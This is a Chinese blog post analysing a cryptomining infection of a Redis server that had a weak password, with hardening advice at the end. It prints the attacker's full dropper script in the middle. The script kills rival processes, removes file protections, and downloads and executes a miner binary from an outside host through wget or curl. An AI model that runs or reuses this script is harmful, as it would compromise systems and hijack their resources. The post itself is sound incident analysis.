关于redis服务器d.powreofwish.com注入挖矿程序的问题

最新推荐文章于 2023-11-29 14:20:41 发布
置顶 最新推荐文章于 2023-11-29 14:20:41 发布
阅读量1k 收藏
点赞数 2
分类专栏: 其它应用 centos系统应用 文章标签: powreofwish centos ubuntu nginx linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leekwen/article/details/112008196
版权

概述

全文参见《近期基于Redis蜜罐捕获的恶意挖矿活动

链接地址:https://www.freebuf.com/articles/system/256715.html

这里是搭建了一个蜜罐,等待攻击者入瓮,而实际在生产环境中,因为Redis弱密码的存在,导致自己的服务器成为了攻击者。

攻击者通过redis的默认端口,弱口令密码,注入到redis服务器内部,大概有4个Back1-4的crontab进程。

如下图,图来自FreeBUF,为借图:

对应下载文件的链接地址: http://d.powreofwish.com/pm.sh

pm.sh的脚本文件内容:

PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin

cd /usr/bin

if [ -x "/usr/bin/md5sum" -o -x "/bin/md5sum" ];then
	sum=`md5sum pamdicks|grep b5a9c7bd8fdb2b6e5c4431a90b83010f|grep -v grep |wc -l`
	if [ $sum -eq 1 ]; then
		chmod +x /usr/bin/pamdicks
		/usr/bin/pamdicks
		exit 0
	fi
fi

sleep 1

if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get install -y unhide
fi

sleep 1

if [ -x "$(command -v yum)" ]; then
yum install -y epel-release
yum install -y unhide
fi

sleep 1

unhide quick |grep PID:|awk '{print $4}'|xargs -I % kill -9 % 2>/dev/null
ps aux | grep -v grep | grep 'hearme' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cc' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'pc' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xr' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'png' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ups' | awk '{print $2}' | xargs -I % kill -9 %
pkill ups
pkill cc
pkill pc
pkill xr
pkill png
pkill kdevtmpfsi

sleep 1

/usr/bin/chattr -i /usr/bin/pamdicks
/usr/bin/chattr -i /var/lib/cc
/usr/bin/t -i /usr/bin/pamdicks
/usr/bin/t -i /var/lib/cc
/bin/rm -rf /usr/bin/pamdicks
/bin/rm -rf /var/lib/cc

/usr/bin/chattr -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
/usr/bin/chattr +i /tmp/kdevtmpfsi

/usr/bin/t -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
/usr/bin/t +i /tmp/kdevtmpfsi

if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs http://a.powreofwish.com/cc -o /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/wge"  -o  -x "/bin/wge" ]; then
   wge -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs http://a.powreofwish.com/cc -o /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
elif [ -x "/usr/bin/url"  -o  -x "/bin/url" ]; then
   url -fs http://a.powreofwish.com/cc -o /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
else
   rpm -e --nodeps wget
   yum -y install wget
   wget -c http://a.powreofwish.com/cc -O /var/lib/cc && chmod +x /var/lib/cc && /var/lib/cc
fi

通过wget和curl下载对应的挖矿程序后,通过unhiden进行隐藏此程序;

unhide 是一个小巧的网络取证工具,能够发现那些借助 rootkit、LKM 及其它技术隐藏的进程和 TCP/UDP 端口。

对应的程序可以通过IDA进行打开,上述文件有描述,不再赘述了。

避免弱口令,常用端口请做下修改,避免使用root用户直接启动redis服务,时常观察你自己的服务器,有没有爆高的进程在跑。

安全无小事,一个不留意,你的裤子就被别人给脱了。 

Leekwen
关注
专栏目录
正确解决redis.clients.jedis.exceptions.JedisException: Could not get a resource from the pool异常的有效解决方法
wbajsjhhhhh的博客
05-05 2614
正确解决redis.clients.jedis.exceptions.JedisException: Could not get a resource from the pool异常的有效解决方法
解决redislinuxcentos)下的一个挖矿漏洞
qq_34870166的博客
01-24 5641
redis挖矿漏洞
挖矿病毒分析(centos7)
ntgengyf的博客
07-25 884
本次服务器被入侵,被人植入了密钥文件,导致入侵者可以免密登录服务器,在redis中看到了一个很奇怪的key,它的value的意思是一个定时任务通过curl下载某个sh脚本,并执行,看到网上的一位博主,总结的很好,它总结的原因如下。比较有名的挖矿蠕虫病毒,攻击手段为通过redis感染服务器,如果redis的端口为默认的6379且暴露在公网上,且没有设置客户端连接密码认证,很容易感染,这个病毒是分级别的,好在我遇到的是比较简单的,解决方法如下。.相关的代码,查看进程发现果然多了一个redis-cli的进程。
记一次挖矿木马pamdicks的解决过程
qq_26147675的博客
11-19 1631
最近安装redis的时候不慎忘记了设置redis密码,导致6379端口受到挖矿病毒攻击,伪造公钥进行免密登录,种下了挖矿木马,经过四个小时的对线终于把病毒干掉,世界清静了。
centos7系统被入侵,挂载挖矿木马-pamdicks-(1)临时处理
ntgengyf的博客
07-25 606
根据隐藏进程以及隐藏文件不可见的特性,进行搜索分析,得出系统内核被篡改,将文件名称和进程信息给屏蔽。以后得加强注意这三方面的安全问题,本次木马程序并未涉及文件防篡改配置,不然也只能重装系统进行处理了。开发使用过程中,发现经常有服务无故关闭,登录服务器经检查,发现CPU使用率达到100%。删除原文件,并创建一个顶包空文件,然后使用系统chattr对其进行锁定禁止修改。及文件删除,但是重启后又自行恢复,还有其他机器,也经过一夜,死灰复燃了。用户直接启动,导致内核被修改,问题难度复杂化。
pamdicks挖矿病毒处理
最新发布
初级驾照的博客
11-29 124
【代码】pamdicks挖矿病毒处理。
我们一起来学习redis吧【redis的启动和关闭,配置文件详解】【redis.windows.conf和redis.windows-service.conf文件的区别】
热门推荐
summer_style的博客
06-03 1万+
1:redis的安装 1.1:redis在window系统的安装 省略,可以自行百度 我这里安装的压缩版 1.2:redislinux系统的安装 现在还没有用到,用到了再补上TODO 2:redis的服务启动 2.1:在windows系统中 启动redis服务端 使用cmd进入到redis的安装目录 redis-server.exe redis.windows.conf 可以在windows系统中编写一个启动文件,可以把该指令写入到startup.cmd文件中 启动redis客户端 重新启用一个cmd会
nested exception is redis.clients.jedis.exceptions.JedisDataException: NOAUTH Authentication requir
qianyel的专栏
07-13 2685
springboot 1.5X 升级2.0时,redis 配置密码报错 org.springframework.dao.InvalidDataAccessApiUsageException: NOAUTH Authentication required.; nested exception is redis.clients.jedis.exceptions.JedisDataException: NOAUTH Authentication required. at org.springframe.
python 连接 Linuxredis 报错 (redis.exceptions.ConnectionError: Error 10061 ...由于目标计算机积极拒绝,无法连接)
sc_jizhi的博客
04-16 5936
文章目录未指定IP地址报错未修改redis.conf报错防火墙问题,未开放6379端口号 未指定IP地址报错 😑 我的报错如下: During handling of the above exception, another exception occurred: Traceback (most recent call last): File “D:\wjpythonwj\redis_1.py”, line 21, in result = rs.set(‘name’,‘itcast’) File “D:
ServiceStack.Redis.3.9.29.0
01-20
4. **使用API操作数据**:调用客户端的方法执行各种Redis操作,例如`redis.Set("key", "value")`来设置键值对。 总之,ServiceStack.Redis 3.9.29.0是一个可靠的工具,使得.NET开发者能够充分利用Redis的功能,为...
pamdicks 挖矿程序处理
tangbin0505的博客
08-20 960
安装sysdig curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash 检测所有程序已隐藏进程 sysdig -c topprocs_cpu ll -h /proc/“pid”/ 根据系统环境变量,检查各目录下是否存在pamdicks find / -name pamdicks 共计有两个/usr/bin/pamdicks和/bin/pamdicks 解决: 删除原文件,并
python挖矿木马_centos7系统被入侵,挂载挖矿木马-pamdicks-(1)临时处理
weixin_39968820的博客
12-06 226
###故障说明故障环境配置 开发测试服务器(腾讯云); 系统:centos7 ; 程序启动模式:root用户直接启动; 网络环境:所有端口全部对外开放(使用仅屏蔽部分关键端口ssh,redis,rabbitmq等); 为方便服务器间数据传输方便,采用了ssh互信方式。故障现象 开发使用过程中,发现经常有服务无故关闭,登录服务器经检查,发现CPU使用率达到100%。 在检测异常进程中,未发现CPU使...
linux中了挖矿病毒详细解决方案
wu_qing_song的博客
10-27 5084
linux挖矿病毒已解决
redis服务器被攻击,服务器CentOS Linux release 7.6.1810 (Core)
qq_35456400的博客
06-23 1814
没想到这么容易被攻击了,密码是简单密码,端口号是默认的6379。可能太容易被破解了,换了下端口号还是不行。第二天sentinel的大量报这个错。 2738:X 23 Jun 2020 15:28:24.004 * +fix-slave-config slave 127.0.0.1:5480 127.0.0.1 5480 @ mymonitor 127.0.0.1 5479 2738:X 23 Jun 2020 15:28:34.104 * +fix-slave-config slave 127.0.0..
Redis 阿里云服务器遭遇攻击
mrathena
11-20 1827
博文目录 文章目录攻击提醒查看异常638063796381补救操作系统操作Redis添加密码认证残留问题 攻击提醒 通过描述来看, 我的服务器被挂马, 一直在尝试攻击别人服务器的6379端口, 阿里云一定时限内禁止我访问其他服务器的6379端口 我估计是因为我的Redis使用了默认的6379端口, 且没有设置密码, 且开放了一堆端口到公网, 且使用的是root账户, 被人扫到了, 然后通过漏洞做了不好的事情, 我是Linux小白, 只能百度看看有什么查漏补缺的措施了 查看异常 执行top发现有两个进程占
挖矿木马追踪】GuardMiner团伙
Websec
03-10 2852
原文章:https://s.tencent.com/research/report/1265.html 该挖矿木马具备较强的自动化攻击和扩散感染能力; l攻击成功后的恶意脚本会关闭linux防火墙,使系统安全性进一步下降; l会禁用或卸载多款云主机安全软件; l从比特币交易记录中动态获取C2地址; l会清除竞品挖矿木马,杀死CPU占用超过40%的进程; l依次下载挖矿程序、守护程序和攻击程序; l通过通过安装crontab任务、写入SSH authorized_key...
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3877
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的入门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
【教你搭建服务器系列】(7)一次服务器被黑的排查全过程
HaC 的博客
06-01 3227
前一阵子腾讯云搞活动,哈C我买了个轻量级的服务器,部署了自己的网站。 一切都井然有条的进行中。 直到某天清晨,我一如既往的打开我的网站,发现网站竟然打不开了。 于是我进行了一系列的排查。 1、排查日志 第一时间想到的就是登录服务器,查看异常登录的日志。 好家伙,我发现服务器竟然无法登录了! 1)VNC登录服务器 第一时间想到的应该是密码登录被禁用了。 于是我在腾讯云后台使用VNC登录。 无法通过客户端SSH远程登录时,可以通过VNC登录来登录服务器. 2)查看sshd_config文件 查看了/et
利用redis 漏洞入侵挖矿临时解决办法
weixin_30955341的博客
08-24 370
top 看到一个bashd的进程占据了cpu ps aux |grep bashd cd /tmp 发现ddg.2011 的文件。root dump.rdb 在/root/.ssh 也有奇怪的文件 vim /etc/sshd/sshd_config 被人修改过 cd /var/spool/cron 被人加了新的crontab 全部删除,crontab 里面有他执行的脚本和命令,服务器...
start redis-server.exe redis.windows.conf
09-14
您好!很抱歉,我无法直接执行命令或者操作您的计算机。我是一个基于文本的AI助手,无法直接操作系统或执行命令。但是,我可以为您提供有关Redis服务器配置以及启动的一般信息。 要启动Redis服务器,请按照以下步骤进行操作: 1. 打开命令行终端(Command Prompt)或终端(Terminal)窗口。 2. 导航到Redis安装目录。如果已将Redis添加到系统路径中,则可以在任何位置输入`redis-server.exe`来启动。否则,您需要导航到Redis安装目录。 3. 运行以下命令来启动Redis服务器: ``` redis-server.exe redis.windows.conf ``` 这将使用`redis.windows.conf`文件中的配置启动Redis服务器。 请确保已正确安装Redis,并且已将其路径添加到系统路径中。此外,确保`redis.windows.conf`文件存在于Redis安装目录中,并包含正确的配置。 如果您遇到任何问题,请提供更多详细信息,以便我可以更好地帮助您。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leekwen

您的鼓励,是我坚持更新的动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值